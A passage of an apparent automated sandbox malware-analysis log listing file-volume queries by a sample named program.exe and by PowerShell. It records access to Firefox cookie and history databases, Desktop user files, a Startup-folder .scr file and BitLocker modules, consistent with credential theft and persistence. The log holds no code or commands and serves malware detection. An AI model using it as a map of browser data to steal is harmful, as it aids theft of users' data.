                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
